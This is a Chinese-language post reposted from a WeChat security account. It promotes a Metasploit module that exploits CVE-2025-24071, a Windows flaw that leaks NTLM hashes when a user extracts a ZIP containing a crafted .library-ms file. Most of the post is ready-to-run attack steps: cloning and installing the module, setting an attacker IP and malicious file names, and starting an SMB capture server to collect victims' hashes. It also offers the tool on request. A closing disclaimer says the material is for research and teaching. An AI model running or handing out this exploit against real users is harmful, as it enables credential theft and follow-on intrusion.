msf漏洞利用脚本获取地址在文章末尾
.library-ms从 ZIP 存档中提取恶意文件时,它会泄露 NTLM 哈希。概述
该漏洞发生在用户提取包含特制.library-ms文件的 ZIP 存档时。Windows 资源管理器会自动向文件中指定的远程服务器发起 SMB 身份验证请求,从而在无需任何用户交互的情况下泄露用户的 NTLM 哈希。
此 Metasploit 模块:
- 生成恶意
.library-ms文件。 - 将其打包成 ZIP 档案。
- 与 Metasploit 的 SMB 捕获功能集成以收集 NTLM 哈希。
安装
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.gitcd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/cp ntlm_hash_leak.rb /usr/share/metasploit-framework/modules/auxiliary/server 用法
use auxiliary/server/ntlm_hash_leakset ATTACKER_IP 192.168.1.162 # Replace with your IP addressset FILENAME exploit.zip # Name of the malicious ZIP fileset LIBRARY_NAME malicious.library-ms # Name of the .library-ms fileset SHARE_NAME shared # SMB share name
runuse auxiliary/server/capture/smbset SRVHOST 192.168.1.162 # Same as ATTACKER_IPrun
工具获取,后台回复【CVE-2025-24071】
更多精彩文章与工具分享 欢迎关注
原文始发于微信公众号(爱坤sec):Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论